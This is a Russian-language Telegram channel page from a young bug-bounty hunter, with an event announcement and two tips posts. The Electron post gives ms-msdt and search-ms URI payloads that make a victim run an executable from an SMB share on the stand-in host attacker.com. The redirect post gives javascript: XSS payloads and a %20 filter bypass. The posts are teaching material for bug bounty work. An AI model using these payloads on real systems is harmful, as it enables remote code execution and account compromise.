en
Feedback
Записки Зёмы

Записки Зёмы

Open in Telegram

Канал одного клоуна-багхантера-пентестера. 17 y.o. third-year student of the TCMC (Information Security). Some not regular notes from and for myself. h1: zelenskyy && 0xlivebeef Quality content is not included. contact: t.me/damnwaree

Show more
306
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
Repost from Багхантер
😭😒🫕 Кузькина мать 30 октября 1961 года серьезные люди собрались на Новой Земле с одной целью - взорвать термоядерную авиац
😭😒🫕 Кузькина мать 30 октября 1961 года серьезные люди собрались на Новой Земле с одной целью - взорвать термоядерную авиационную бомбу "Кузькину мать" или по-другому "Царь-бомбу" (путем сброса её с самолета) на ядерном полигоне «Сухой Нос». Итоговая мощность взрыва составила примерно 58,6 мегатонн в тротилловом эквиваленте, что соответствует дефекту масс примерно 2.65 кг. В радиусе 35 километров от точки взрыва все здания были полностью уничтожены, ударная волна 3 раза обогнула Землю, а сама ядерная вспышка была видна на расстоянии более 1000 км. 14 октября 2023 года в 18:00 серьезные люди (сотни а может быть даже тысячи багхантеров и 10 докладчиков) соберутся онлайн на трансляции в канале "Багхантер" с одной целью - послушать доклады экспертов мирового уровня, известных багхантеров, специалистов по информационной безопасности с большим опытом. "Мы вам еще покажем кузькину мать!" Примерное расписание: завтра, в 18:10 - 18:30 - «Техобслуживание и ремонт системы питания дизельного двигателя» 18:30 - 18:50 - «Вкатываемся в Web3 на примере TON» 18:50 - 19:10 - «Вкатываемся в Web3» 19:10 - 19:30 - «Как сломать банкомат... через интернет!» 19:30 - 20:10 - «Логические баги из реальной жизни» 20:10 - 20:30 - «Generate werkzeug pins» 20:30 - 20:50 - «развитие ББ ВК» 20:50 - 21:10 - «нашёл SELF XSS не сдавайся» 21:10 - 21:30 - «Zerocode security v0.7 - Mobile builders» 21:30 - 21:50 - «Наступательные инструменты разработчика» 🐹 Багхантер

Недавно у Багхантер (кто не подписан, объяснитесь, как так вышло?) проходил конкурс, в котором нужно было написать про свою с
Недавно у Багхантер (кто не подписан, объяснитесь, как так вышло?) проходил конкурс, в котором нужно было написать про свою самую лучшую находку. Я принял участие и занял почётное 3 место. Получил носочки, значки, промо на +3к к репорту у ВК и стикеры. Спасибо огромное Юре за конкурс, а также вендорам за предоставленные призы <3 Статья про уязвимость будет уже скоро на канале.

Bug Bounty Tips #2 Сегодня затронем приложения на Electron. А конкретнее доведение XSS до RCE (ну или почти). Что может понадобиться для упрощения работы: Сканер electronegativity. Он нужен для сканирования Electron приложений на различные мисконфигурации; Сканер nodejsscan. Этот инструмент умеет в сканирование модулей nodejs, которые наверняка встроены в исследуемый продукт. Первым делом нужно найти XSS в исследуемом сервисе. Довольно часто её причиной становится Markdown (на своей практике встречал уже несколько раз). Найти больше информации по XSS в Markdown можно тут. Если XSS на нашем сайте не была найдена, нужно идти в код приложение и смотреть как приложения открывает ссылки. Кейс 1 - Внешние ссылки открываются во внешнем браузере. Решение - Искать мисконфигурации открытия. Например, проверки на то, что ссылка содержит https://example.com/, а не начинается на это. Ещё можно попытаться кликнуть средней кнопкой мыши. Кейс 2 - Внешние ссылки открываются в самом приложении. Если встретили такое поведение - вам упростили работу. Итак. Мы смогли найти XSS/возможность открыть внешние ссылки. Что дальше? - встраивать полезные нагрузки. Если electron приложение имеет мисконфигурацию в области работы с nodejs - вы сможете выполнить код. Если нет - смотрите на версию Electron. Вполне возможно, что попадётся версия, уязвимая к различным обходам nodeIntegration. Если выполнить код не удалось, то можно попытаться выполнить удалённый код/повысить импакт XSS при помощи различных URI схем. Примеры того, что можно использовать:
ms-msdt:-id PCWDiagnostic /moreoptions false /skip true /param IT_BrowseForFile="\\attacker.com\smb_share\malicious_executable.exe" /param IT_SelectProgram="NotListed" /param IT_AutoTroubleshoot="ts_AUTO
search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20update

Эти "ссылки" необходимо открыть каким-либо образом. В случае с markdown их можно встроить в ссылки [Some Text](Payload), а затем открыть при помощи СКМ. Если вы нашли XSS/смогли открыть произвольную страницу - откройте при помощи window.open(Payload) На этих строчках подхожу к концу и желаю всем удачи в поисках уязвимостей. @zema_notes p.s. перечитал пост и понял. что кому-то может он показаться непонятным, поэтому если есть вопросы - пишите в комменты, постараюсь ответить.

Давно тут не появлялся. Разбавлю пустоту небольшими Tips для Bug Bounty. Часть будет многим известна, часть, но возможно, для кого-то станет чем-то новеньким. Всё же мой канал не только для профессионалов в сфере ИБ. Что же, BB Tips #1. XSS в Redirect. Представим ситуацию - вы нашли кнопку редиректа, значение которой подставляется со стороны пользователя. Open Redirect принимается мало где, именно поэтому нужно попытаться докрутить до XSS, чтобы был импакт. Как это сделать рассмотрим ниже. Вариант 1 (самый топорный, но часто срабатывает). Payload -
javascript:alert(document.domain)
Вставляем, кликаем и... Ничего не происходит. Нас просто отправляет на страницу about#blocked (или about#blank). Решение - кликать средней кнопкой мыши по ссылке. Hint: ещё это срабатывает с Markdown. Payload -
[a](javascript:alert(document.domain))
Вариант 2. Если разработчики фильтруют строку, чтобы она не начиналась с javascript:, при помощи регулярного выражения следующего вида
^(?!javascript:).+
можно подставить пробел в начало нашей нагрузки. Если ссылка подставляется из параметров, поставьте %20, чтобы пейлоад приобрёл следующий вид:
%20javascript:alert()
Вставляем, кликаем СКМ, наслаждаемся XSS.